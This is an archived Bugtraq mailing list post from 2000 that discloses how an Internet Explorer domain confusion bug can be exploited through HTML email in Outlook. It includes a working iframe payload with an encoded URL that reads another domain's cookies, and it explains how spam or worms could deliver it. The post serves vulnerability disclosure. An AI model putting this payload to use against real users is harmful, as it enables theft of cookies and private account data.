Bugtraq mailing list archives

IE Domain Confusion Vulnerability is an Email problem also

From: rms2000 () BELLATLANTIC NET (Richard M. Smith)
Date: Fri, 12 May 2000 08:33:48 -0400


Hi,

This same IE bug can also be exploited from an HTML Email
message in Outlook and Outlook Express.  The trick is
to put the magic URL in an HTML IFRAME tag.  Example:

<iframe
src="http://www.peacefire.org%2fsecurity%2fiecookies%2f
showcookie.html%3f.yahoo.com/">
</iframe>

A malicious Email message could include many IFRAMEs
to grab cookies from different domains.  The cookies
are stolen when the message is read.

Using an Email message, an attack can be directed
at a particular person or a group of people without
them every going to a Web site.  The exploit could
also be included in a spam Email message or in the
payload of an Email worm/virus.

I suspect that the same trick works in newsgroup messages,
but I haven't had the time to run the experiment.

This is a pretty bad bug.  People's private data at
Web sites is at risk here.

Richard

==========================================
Richard M. Smith
Internet consultant
Email: rms2000 () bellatlantic net
http://www.tiac.net/users/smiths
==========================================

Current thread:

Re: non-exec stack, (continued)
- - - Re: non-exec stack Casper Dik (May 09)
    - Re: non-exec stack Nate Eldredge (May 10)
    - 쀼릿: Re: non-exec stac ZhaoQian (May 10)
    - Alert: IIS ism.dll exposes file contents Cerberus Security Team (May 11)
    - ISSalert: Internet Security Systems Security Advisory: Microsoft IIS Remote Denial of Service Attack Warren Barrow (May 11)
    - Remote DoS attack in Internet Information Server 4.0 & 5.0 "Malformed Extension Data in URL" Vulnerability Ussr Labs (May 11)
    - Microsoft Security Bulletin (MS00-030) Microsoft Product Security (May 11)
    - IE Domain Confusion Vulnerability Foo Bar (May 11)
    - Overflow in Outlook Express 4.* - too long filenames with graphic format extension Ultor (May 12)
    - Eudora Sensitive to Long Filenames Ron Moritz (May 18)
    - IE Domain Confusion Vulnerability is an Email problem also Richard M. Smith (May 12)
    - Re: IE Domain Confusion Vulnerability doesn't matter much Marc Slemko (May 12)
    - Re: IE Domain Confusion Vulnerability doesn't matter much Richard M. Smith (May 15)
    - Vulnerability in CGI counter 4.0.7 by George Burgyan Howard M. Kash III (May 15)
    - Vulnerability in EMURL-based e-mail providers Pierre Benoit (May 15)
    - New Solaris root exploit for /usr/lib/lp/bin/netpr Anonymous (May 12)
    - Microsoft Security Bulletin (MS00-034) Microsoft Product Security (May 12)
    - Microsoft Office 2000 Advisory dildog (May 12)